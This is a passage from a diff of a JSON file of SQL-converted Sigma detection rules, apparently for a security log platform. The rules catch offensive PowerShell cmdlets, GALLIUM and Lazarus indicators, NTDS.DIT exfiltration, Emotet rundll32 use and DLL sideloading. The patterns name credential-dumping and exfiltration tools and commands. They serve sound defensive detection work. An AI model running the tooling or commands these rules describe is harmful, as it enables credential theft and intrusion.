ESCAPE '\\' OR CommandLine LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Add-ScrnSaveBackdoor%' ESCAPE 
'\\' OR CommandLine LIKE '%Check-VM%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR CommandLine LIKE '%Decrypt-Hash%' ESCAPE '\\' OR CommandLine LIKE '%Do-Exfiltration%' ESCAPE '\\' OR CommandLine LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR CommandLine LIKE '%Exploit-Jboss%' ESCAPE '\\' OR CommandLine LIKE '%Find-Fruit%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR CommandLine LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR CommandLine LIKE '%Get-ChromeDump%' ESCAPE '\\' OR CommandLine LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR CommandLine LIKE '%Get-FoxDump%' ESCAPE '\\' OR CommandLine LIKE '%Get-GPPPassword%' ESCAPE '\\' OR CommandLine LIKE '%Get-IndexedItem%' ESCAPE '\\' OR CommandLine LIKE '%Get-Keystrokes%' ESCAPE '\\' OR CommandLine LIKE '%Get-LSASecret%' ESCAPE '\\' OR CommandLine LIKE '%Get-PassHashes%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RickAstley%' ESCAPE '\\' OR CommandLine LIKE '%Get-Screenshot%' ESCAPE '\\' OR CommandLine LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServicePermission%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR CommandLine LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR CommandLine LIKE '%Get-System%' ESCAPE '\\' OR CommandLine LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR CommandLine LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR CommandLine LIKE 
'%Get-Unconstrained%' ESCAPE '\\' OR CommandLine LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR CommandLine LIKE '%Get-VaultCredential%' ESCAPE '\\' OR CommandLine LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR CommandLine LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR CommandLine LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR CommandLine LIKE '%HTTP-Login%' ESCAPE '\\' OR CommandLine LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR CommandLine LIKE '%Install-SSP%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Certify%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DAFT%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DCSync%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Farmer%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Gopher%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Grouper%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR 
CommandLine LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Lockless%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MITM6%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PortScan%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PsExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PSInject%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RunAs%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SCShell%' 
ESCAPE '\\' OR CommandLine LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Sharp%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-StandIn%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tater%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Whisker%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WireTap%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR CommandLine LIKE '%MailRaider%' ESCAPE '\\' OR CommandLine LIKE '%New-HoneyHash%' ESCAPE '\\' OR CommandLine LIKE '%New-InMemoryModule%' ESCAPE '\\' OR CommandLine LIKE '%Out-Minidump%' ESCAPE '\\' OR CommandLine LIKE '%Port-Scan%' ESCAPE '\\' OR CommandLine LIKE '%PowerBreach%' ESCAPE '\\' OR 
CommandLine LIKE '%powercat %' ESCAPE '\\' OR CommandLine LIKE '%PowerUp%' ESCAPE '\\' OR CommandLine LIKE '%PowerView%' ESCAPE '\\' OR CommandLine LIKE '%Remove-Update%' ESCAPE '\\' OR CommandLine LIKE '%Set-MacAttribute%' ESCAPE '\\' OR CommandLine LIKE '%Set-Wallpaper%' ESCAPE '\\' OR CommandLine LIKE '%Show-TargetScreen%' ESCAPE '\\' OR CommandLine LIKE '%Start-CaptureServer%' ESCAPE '\\' OR CommandLine LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR CommandLine LIKE '%VolumeShadowCopyTools%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_malicious_cmdlets.yml" + "filename": "image_load_wmiprvse_wbemcomn_dll_hijack.yml" }, { - "title": "GALLIUM IOCs", - "id": "440a56bf-7873-4439-940a-1c8a671073c2", + "title": "FoggyWeb Backdoor DLL Loading", + "id": "640dc51c-7713-4faa-8a0e-e7c0d9d4654c", "status": "test", - "description": "Detects artifacts associated with GALLIUM cyber espionage group as reported by Microsoft Threat Intelligence Center in the December 2019 report.", - "author": "Tim Burrell", + "description": "Detects DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor. 
Which loads a malicious version of the expected \"version.dll\" dll", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.command_and_control", - "attack.t1212", - "attack.t1071", - "attack.g0093" + "attack.resource_development", + "attack.t1587" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((Hashes LIKE '%SHA256=9ae7c4a4e1cfe9b505c3a47e66551eb1357affee65bfefb0109d02f4e97c06dd%' ESCAPE '\\' OR Hashes LIKE '%SHA256=7772d624e1aed327abcd24ce2068063da0e31bb1d5d3bf2841fc977e198c6c5b%' ESCAPE '\\' OR Hashes LIKE '%SHA256=657fc7e6447e0065d488a7db2caab13071e44741875044f9024ca843fe4e86b5%' ESCAPE '\\' OR Hashes LIKE '%SHA256=2ef157a97e28574356e1d871abf75deca7d7a1ea662f38b577a06dd039dbae29%' ESCAPE '\\' OR Hashes LIKE '%SHA256=52fd7b90d7144ac448af4008be639d4d45c252e51823f4311011af3207a5fc77%' ESCAPE '\\' OR Hashes LIKE '%SHA256=a370e47cb97b35f1ae6590d14ada7561d22b4a73be0cb6df7e851d85054b1ac3%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5bf80b871278a29f356bd42af1e35428aead20cd90b0c7642247afcaaa95b022%' ESCAPE '\\' OR Hashes LIKE '%SHA256=6f690ccfd54c2b02f0c3cb89c938162c10cbeee693286e809579c540b07ed883%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3c884f776fbd16597c072afd81029e8764dd57ee79d798829ca111f5e170bd8e%' ESCAPE '\\' OR Hashes LIKE '%SHA256=1922a419f57afb351b58330ed456143cc8de8b3ebcbd236d26a219b03b3464d7%' ESCAPE '\\' OR Hashes LIKE '%SHA256=fe0e4ef832b62d49b43433e10c47dc51072959af93963c790892efc20ec422f1%' ESCAPE '\\' OR Hashes LIKE '%SHA256=7ce9e1c5562c8a5c93878629a47fe6071a35d604ed57a8f918f3eadf82c11a9c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=178d5ee8c04401d332af331087a80fb4e5e2937edfba7266f9be34a5029b6945%' ESCAPE '\\' OR Hashes LIKE '%SHA256=51f70956fa8c487784fd21ab795f6ba2199b5c2d346acdeef1de0318a4c729d9%' ESCAPE '\\' OR Hashes LIKE 
'%SHA256=889bca95f1a69e94aaade1e959ed0d3620531dc0fc563be9a8decf41899b4d79%' ESCAPE '\\' OR Hashes LIKE '%SHA256=332ddaa00e2eb862742cb8d7e24ce52a5d38ffb22f6c8bd51162bd35e84d7ddf%' ESCAPE '\\' OR Hashes LIKE '%SHA256=44bcf82fa536318622798504e8369e9dcdb32686b95fcb44579f0b4efa79df08%' ESCAPE '\\' OR Hashes LIKE '%SHA256=63552772fdd8c947712a2cff00dfe25c7a34133716784b6d486227384f8cf3ef%' ESCAPE '\\' OR Hashes LIKE '%SHA256=056744a3c371b5938d63c396fe094afce8fb153796a65afa5103e1bffd7ca070%' ESCAPE '\\' OR Hashes LIKE '%SHA1=53a44c2396d15c3a03723fa5e5db54cafd527635%' ESCAPE '\\' OR Hashes LIKE '%SHA1=9c5e496921e3bc882dc40694f1dcc3746a75db19%' ESCAPE '\\' OR Hashes LIKE '%SHA1=aeb573accfd95758550cf30bf04f389a92922844%' ESCAPE '\\' OR Hashes LIKE '%SHA1=79ef78a797403a4ed1a616c68e07fff868a8650a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4f6f38b4cec35e895d91c052b1f5a83d665c2196%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1e8c2cac2e4ce7cbd33c3858eb2e24531cb8a84d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=e841a63e47361a572db9a7334af459ddca11347a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c28f606df28a9bc8df75a4d5e5837fc5522dd34d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2e94b305d6812a9f96e6781c888e48c7fb157b6b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=dd44133716b8a241957b912fa6a02efde3ce3025%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8793bf166cb89eb55f0593404e4e933ab605e803%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a39b57032dbb2335499a51e13470a7cd5d86b138%' ESCAPE '\\' OR Hashes LIKE '%SHA1=41cc2b15c662bc001c0eb92f6cc222934f0beeea%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d209430d6af54792371174e70e27dd11d3def7a7%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1c6452026c56efd2c94cea7e0f671eb55515edb0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c6b41d3afdcdcaf9f442bbe772f5da871801fd5a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4923d460e22fbbf165bbbaba168e5a46b8157d9f%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f201504bd96e81d0d350c3a8332593ee1c9e09de%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ddd2db1127632a2a52943a2fe516a2e7d05d70d2%' ESCAPE '\\') OR sha256 IN 
('9ae7c4a4e1cfe9b505c3a47e66551eb1357affee65bfefb0109d02f4e97c06dd', '7772d624e1aed327abcd24ce2068063da0e31bb1d5d3bf2841fc977e198c6c5b', '657fc7e6447e0065d488a7db2caab13071e44741875044f9024ca843fe4e86b5', '2ef157a97e28574356e1d871abf75deca7d7a1ea662f38b577a06dd039dbae29', '52fd7b90d7144ac448af4008be639d4d45c252e51823f4311011af3207a5fc77', 'a370e47cb97b35f1ae6590d14ada7561d22b4a73be0cb6df7e851d85054b1ac3', '5bf80b871278a29f356bd42af1e35428aead20cd90b0c7642247afcaaa95b022', '6f690ccfd54c2b02f0c3cb89c938162c10cbeee693286e809579c540b07ed883', '3c884f776fbd16597c072afd81029e8764dd57ee79d798829ca111f5e170bd8e', '1922a419f57afb351b58330ed456143cc8de8b3ebcbd236d26a219b03b3464d7', 'fe0e4ef832b62d49b43433e10c47dc51072959af93963c790892efc20ec422f1', '7ce9e1c5562c8a5c93878629a47fe6071a35d604ed57a8f918f3eadf82c11a9c', '178d5ee8c04401d332af331087a80fb4e5e2937edfba7266f9be34a5029b6945', '51f70956fa8c487784fd21ab795f6ba2199b5c2d346acdeef1de0318a4c729d9', '889bca95f1a69e94aaade1e959ed0d3620531dc0fc563be9a8decf41899b4d79', '332ddaa00e2eb862742cb8d7e24ce52a5d38ffb22f6c8bd51162bd35e84d7ddf', '44bcf82fa536318622798504e8369e9dcdb32686b95fcb44579f0b4efa79df08', '63552772fdd8c947712a2cff00dfe25c7a34133716784b6d486227384f8cf3ef', '056744a3c371b5938d63c396fe094afce8fb153796a65afa5103e1bffd7ca070') OR sha1 IN ('53a44c2396d15c3a03723fa5e5db54cafd527635', '9c5e496921e3bc882dc40694f1dcc3746a75db19', 'aeb573accfd95758550cf30bf04f389a92922844', '79ef78a797403a4ed1a616c68e07fff868a8650a', '4f6f38b4cec35e895d91c052b1f5a83d665c2196', '1e8c2cac2e4ce7cbd33c3858eb2e24531cb8a84d', 'e841a63e47361a572db9a7334af459ddca11347a', 'c28f606df28a9bc8df75a4d5e5837fc5522dd34d', '2e94b305d6812a9f96e6781c888e48c7fb157b6b', 'dd44133716b8a241957b912fa6a02efde3ce3025', '8793bf166cb89eb55f0593404e4e933ab605e803', 'a39b57032dbb2335499a51e13470a7cd5d86b138', '41cc2b15c662bc001c0eb92f6cc222934f0beeea', 'd209430d6af54792371174e70e27dd11d3def7a7', '1c6452026c56efd2c94cea7e0f671eb55515edb0', 
'c6b41d3afdcdcaf9f442bbe772f5da871801fd5a', '4923d460e22fbbf165bbbaba168e5a46b8157d9f', 'f201504bd96e81d0d350c3a8332593ee1c9e09de', 'ddd2db1127632a2a52943a2fe516a2e7d05d70d2')))" + "SELECT * FROM logs WHERE ImageLoaded LIKE 'C:\\\\Windows\\\\ADFS\\\\version.dll' ESCAPE '\\'" ], - "filename": "proc_creation_win_apt_gallium_iocs.yml" + "filename": "image_load_malware_foggyweb_nobelium.yml" }, { - "title": "Suspicious Process Patterns NTDS.DIT Exfil", - "id": "8bc64091-6875-4881-aaf9-7bd25b5dda08", + "title": "Suspicious Volume Shadow Copy Vssapi.dll Load", + "id": "37774c23-25a1-4adb-bb6d-8bb9fd59c0f8", "status": "experimental", - "description": "Detects suspicious process patterns used in NTDS.DIT exfiltration", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the image load of VSS DLL by uncommon executables", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.defense_evasion", + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((NewProcessName LIKE '%\\\\NTDSDump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\NTDSDumpEx.exe' ESCAPE '\\') OR (CommandLine LIKE '%ntds.dit%' ESCAPE '\\' AND CommandLine LIKE '%system.hiv%' ESCAPE '\\') OR CommandLine LIKE '%NTDSgrab.ps1%' ESCAPE '\\') OR (CommandLine LIKE '%ac i ntds%' ESCAPE '\\' AND CommandLine LIKE '%create full%' ESCAPE '\\') OR (CommandLine LIKE '%/c copy %' ESCAPE '\\' AND CommandLine LIKE '%\\\\windows\\\\ntds\\\\ntds.dit%' ESCAPE '\\') OR (CommandLine LIKE '%activate instance ntds%' ESCAPE '\\' AND CommandLine LIKE '%create full%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%ntds.dit%' ESCAPE '\\')) OR (CommandLine LIKE '%ntds.dit%' ESCAPE '\\' AND ((ParentProcessName LIKE '%\\\\apache%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\' OR ParentProcessName LIKE 
'%\\\\AppData\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\apache%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tomcat%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\vssapi.dll' ESCAPE '\\' AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE '\tC:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\{%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\ProgramData\\\\Package Cache\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_ntds.yml" + "filename": "image_load_dll_vssapi_susp_load.yml" }, { - "title": "Potential Emotet Rundll32 Execution", - "id": "54e57ce3-0672-46eb-a402-2c0948d5e3e9", + "title": "Suspicious Unsigned Dbghelp/Dbgcore DLL Loaded", + "id": "bdc64095-d59a-42a2-8588-71fd9c9d9abc", "status": "test", - "description": "Detecting Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL", - "author": "FPT.EagleEye", + "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecract use MiniDumpWriteDump API found in dbghelp.dll or 
dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", + "author": "Perez Diego (@darkquassar), oscd.community, Ecco", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%,RunDLL' ESCAPE '\\' OR CommandLine LIKE '%,Control\\_RunDLL' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%.dll,Control\\_RunDLL' ESCAPE '\\' OR CommandLine LIKE '%.dll\",Control\\_RunDLL' ESCAPE '\\' OR CommandLine LIKE '%.dll'',Control\\_RunDLL' ESCAPE '\\')) OR (ParentProcessName LIKE '%\\\\tracker.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\') AND Signed = 'false')" ], - "filename": "proc_creation_win_malware_emotet_rundll32_execution.yml" + "filename": "image_load_dll_dbghelp_dbgcore_unsigned_load.yml" }, { - "title": "Lazarus Group Activity", - "id": "24c4d154-05a4-4b99-b57d-9b977472443a", - "status": "test", - "description": "Detects different process execution behaviors as described in various threat reports on Lazarus group activity", - "author": "Florian Roth (Nextron Systems), wagga", + "title": "DLL Sideloading Of DBGCORE.DLL", + "id": "9ca2bf31-0570-44d8-a543-534c47c33ed7", + "status": "experimental", + "description": "Detects DLL sideloading of \"dbgcore.dll\"", + "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "tags": [ - "attack.g0032", - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + 
"attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unlikely" + "Legitimate applications loading their own versions of the DLL mentioned in this rule" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%reg.exe save hklm\\\\sam \\%temp\\%\\\\~reg\\_sam.save%' ESCAPE '\\' OR CommandLine LIKE '%1q2w3e4r@#$@#$@#$%' ESCAPE '\\' OR CommandLine LIKE '% -hp1q2w3e4 %' ESCAPE '\\' OR CommandLine LIKE '%.dat data03 10000 -p %' ESCAPE '\\') OR (CommandLine LIKE '%netstat -aon | find %' ESCAPE '\\' AND CommandLine LIKE '%ESTA%' ESCAPE '\\' AND CommandLine LIKE '% > \\%temp\\%\\\\~%' ESCAPE '\\') OR (CommandLine LIKE '%.255 10 C:\\\\ProgramData\\\\IBM\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.DAT%' ESCAPE '\\') OR (CommandLine LIKE '% /c %' ESCAPE '\\' AND CommandLine LIKE '% -p 0x%' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\RECYCLER\\\\%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32 %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%.bin,%' ESCAPE '\\' OR CommandLine LIKE '%.tmp,%' ESCAPE '\\' OR CommandLine LIKE '%.dat,%' ESCAPE '\\' OR CommandLine LIKE '%.io,%' ESCAPE '\\' OR CommandLine LIKE '%.ini,%' ESCAPE '\\' OR CommandLine LIKE '%.db,%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\'))))" ], - "filename": 
"proc_creation_win_apt_lazarus_group_activity.yml" + "filename": "image_load_side_load_dbgcore_dll.yml" }, { - "title": "Reg Disable Security Service", - "id": "5e95028c-5229-4214-afae-d653d573d0ec", + "title": "Potential DLL Sideloading Via comctl32.dll", + "id": "6360757a-d460-456c-8b13-74cf0e60cceb", "status": "experimental", - "description": "Detects a suspicious reg.exe invocation that looks as if it would disable an important security service", - "author": "Florian Roth (Nextron Systems), John Lambert (idea), elhoim", + "description": "Detects potential DLL sideloading using comctl32.dll to obtain system privileges", + "author": "Nasreddine Bencherchali (Nextron Systems), Subhash Popuri (@pbssubhash)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unknown", - "Other security solution installers" + 